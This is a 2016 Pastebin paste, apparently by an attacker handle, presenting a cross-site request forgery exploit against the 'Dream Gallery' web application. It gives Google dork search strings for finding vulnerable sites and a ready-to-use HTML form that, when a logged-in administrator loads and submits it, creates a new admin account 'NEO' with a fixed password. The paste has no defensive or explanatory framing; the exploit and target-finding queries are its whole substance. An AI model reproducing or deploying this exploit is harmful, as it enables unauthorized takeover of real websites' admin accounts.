NEO_KOYE

CSRF Add Admin Exploit

Sep 1st, 2016
242
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.10 KB | None | 0 0
  1. .__ __. _______ ______ __ ___ ______ ____ ____ _______
  2. | \ | | | ____| / __ \ | |/ / / __ \ \ \ / / | ____|
  3. | \| | | |__ | | | | | ' / | | | | \ \/ / | |__
  4. | . ` | | __| | | | | | < | | | | \_ _/ | __|
  5. | |\ | | |____ | `--' | | . \ | `--' | | | | |____
  6. |__| \__| |_______| \______/ |__|\__\ \______/ |__| |_______|
  7.  
  8.  
  9. # Exploit Title: Dream Gallery - CSRF Add Admin Exploit
  10. # Google Dork: 1: "Design by Rafael Clares"
  11. 2: ''inurl:dream/album.php''
  12.  
  13. #Exploit:
  14.  
  15. <html>
  16. <body>
  17. <form method="post" action="http://localhost.com/admin/usuario.php?action=incluir">
  18. <input type="hidden" name="user_login" value="NEO">
  19. <input type="hidden" name="user_password" type="hidden" value="112233" >
  20. <input type="hidden" name="user_email" value="">
  21. <input type="submit" value="create">
  22. </form>
  23. </body>
  24. </html>
Advertisement
Add Comment
Please, Sign In to add comment